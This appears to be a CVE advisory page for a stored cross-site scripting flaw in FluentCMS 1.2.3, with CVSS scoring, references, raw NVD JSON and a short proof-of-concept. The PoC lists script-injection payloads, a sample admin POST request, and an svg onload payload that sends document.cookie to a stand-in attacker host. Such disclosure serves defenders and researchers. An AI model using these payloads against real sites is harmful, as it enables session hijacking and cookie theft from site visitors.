CVE-2025-67349

Description

A cross-site scripting (XSS) vulnerability was identified in FluentCMS 1.2.3. After logging in as an admin and navigating to the "Add Page" function, the application fails to properly sanitize input in the <head> section, allowing remote attackers to inject arbitrary script tags.

CVSS Details

CVSS Score

6.1

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:fluentcms:fluentcms:1.2.3:*:*:*:*:*:*:* - VULNERABLE

FluentCMS 1.2.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2025-67349 PoC - FluentCMS 1.2.3 Stored XSS in Add Page
// Steps:
// 1. Login to FluentCMS as admin
// 2. Navigate to Add Page function
// 3. Inject XSS payload in page content or title field

// XSS Payload Example (inject in <head> section):
// <script>alert(document.cookie)</script>
// or
// <img src=x onerror=alert(document.domain)>
// or
// <svg/onload=fetch('https://attacker.com/steal?c='+document.cookie)>

// HTTP Request Example:
/*
POST /admin/pages/add HTTP/1.1
Host: target.com
Cookie: admin_session=xxxxx
Content-Type: application/x-www-form-urlencoded

page_title=<script>alert(document.cookie)</script>&page_content=<script>alert(document.cookie)</script>&page_section=head
*/

// After submission, any user visiting the page will execute the injected script

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-67349
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-67349
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-67349/
[4] VulDB https://vuldb.com/cve/CVE-2025-67349
[5] https://github.com/eoniboogie/CVE_Disclosures/blob/main/CVE-2025-67349/CVE-2025-67349.md
[6] https://github.com/fluentcms/FluentCMS/issues/2403

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-67349", "sourceIdentifier": "[email protected]", "published": "2025-12-26T15:15:47.810", "lastModified": "2025-12-31T21:36:46.093", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A cross-site scripting (XSS) vulnerability was identified in FluentCMS 1.2.3. After logging in as an admin and navigating to the \"Add Page\" function, the application fails to properly sanitize input in the <head> section, allowing remote attackers to inject arbitrary script tags."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fluentcms:fluentcms:1.2.3:*:*:*:*:*:*:*", "matchCriteriaId": "02DF4664-FB2D-4E1E-B33D-B2775D843640"}]}]}], "references": [{"url": "https://github.com/eoniboogie/CVE_Disclosures/blob/main/CVE-2025-67349/CVE-2025-67349.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/fluentcms/FluentCMS/issues/2403", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}